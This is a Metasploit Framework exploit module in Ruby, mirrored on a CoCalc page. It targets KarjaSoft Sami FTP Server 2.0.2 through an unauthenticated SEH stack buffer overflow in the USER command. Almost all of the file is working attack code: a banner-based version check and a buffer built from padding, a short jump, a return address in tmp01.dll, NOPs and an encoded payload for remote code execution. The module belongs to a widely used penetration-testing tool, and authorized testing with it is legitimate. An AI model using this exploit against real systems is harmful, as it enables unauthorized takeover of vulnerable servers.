CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/sami_ftpd_user.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Seh

11
  prepend Msf::Exploit::Remote::AutoCheck

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name'	=> 'KarjaSoft Sami FTP Server v2.0.2 USER Overflow',

18
        'Description'	=> %q{

19
          This module exploits an unauthenticated stack buffer overflow in

20
          KarjaSoft Sami FTP Server version 2.0.2 by sending an overly long

21
          USER string during login.

22


23
          The payload is triggered when the administrator opens the application

24
          GUI. If the GUI window is open at the time of exploitation, the

25
          payload will be executed immediately. Keep this in mind when selecting

26
          payloads. The application will crash following execution of the

27
          payload and will not restart automatically.

28


29
          When the application is restarted, it will re-execute the payload

30
          unless the payload has been manually removed from the SamiFTP.binlog

31
          log file.

32


33
          This module has been tested successfully on Sami FTP Server versions:

34
          2.0.2 on Windows XP SP0 (x86);

35
          2.0.2 on Windows 7 SP1 (x86);

36
          2.0.2 on Windows 7 SP1 (x64); and

37
          2.0.2 on Windows 10 (1909) (x64).

38
        },

39
        'Author'	=> [

40
          'Muhammad Ahmed Siddiqui', # Discovery

41
          'Critical Security', # Perl exploit

42
          'n30m1nd', # Python exploit - SEH overwrite with 2.0.2 universal tmp01.dll p/p/r

43
          'aushack', # Metasploit

44
          'bcoles' # Metasploit

45
        ],

46
        'Arch'	=> [ ARCH_X86 ],

47
        'License'	=> MSF_LICENSE,

48
        'References'	=>

49
          [

50
            # This vulnerability appears to have been reported multiple times.

51
            ['CVE', '2006-0441'],

52
            ['CVE', '2006-2212'],

53
            ['OSVDB', '25670'],

54
            ['BID', '16370'],

55
            ['BID', '22045'],

56
            ['BID', '17835'],

57
            ['EDB', '1448'],

58
            ['EDB', '1452'],

59
            ['EDB', '1462'],

60
            ['EDB', '3127'],

61
            ['EDB', '3140'],

62
            ['EDB', '40675']

63
          ],

64
        'DefaultOptions' =>

65
          {

66
            'EXITFUNC' => 'seh'

67
          },

68
        'Platform' => ['win'],

69
        'Privileged' => false,

70
        'Payload'	=>

71
          {

72
            'Space'	=> 800,

73
            'BadChars' => "\x00\x0a\x0d\x20\xff",

74
            'EncoderType' => Msf::Encoder::Type::AlphanumMixed

75
          },

76
        'Targets' =>

77
          [

78
            ['Sami FTP Server version 2.0.2', { 'Ret' => 0x10022ADE }], # p/p/r tmp01.dll

79
          ],

80
        'Notes' => {

81
          'Stability' => [ CRASH_SERVICE_DOWN ]

82
        },

83
        'DisclosureDate' => '2006-01-24'

84
      )

85
    )

86


87
    register_options([

88
      Opt::RPORT(21)

89
    ])

90
  end

91


92
  def check

93
    connect

94
    banner = sock.get_once(-1, 3)

95
    disconnect

96


97
    unless banner.include?('Sami FTP Server')

98
      return CheckCode::Safe('Target is not Sami FTP Server')

99
    end

100


101
    if banner.include?('Sami FTP Server 2.0.2')

102
      return CheckCode::Appears('Sami FTP Server version 2.0.2.')

103
    end

104


105
    CheckCode::Detected

106
  end

107


108
  def exploit

109
    connect

110


111
    nseh = "\xeb\x06"

112
    nseh << rand_text_alpha(2)

113
    seh = [target.ret].pack('V')

114


115
    user = rand_text_alpha(596)

116
    user << nseh

117
    user << seh

118
    user << "\x90" * 10

119
    user << payload.encoded

120
    user << "\x90" * (800 - payload.encoded.length)

121


122
    print_status("Sending payload (#{user.length} bytes) ...")

123
    sock.put("USER #{user}\r\n")

124
    sock.recv(4096)

125


126
    sock.put("PASS #{Rex::Text.rand_char(payload_badchars)}\r\n")

127
    sock.recv(4096)

128


129
    handler

130
    disconnect

131
  end

132
end

133


134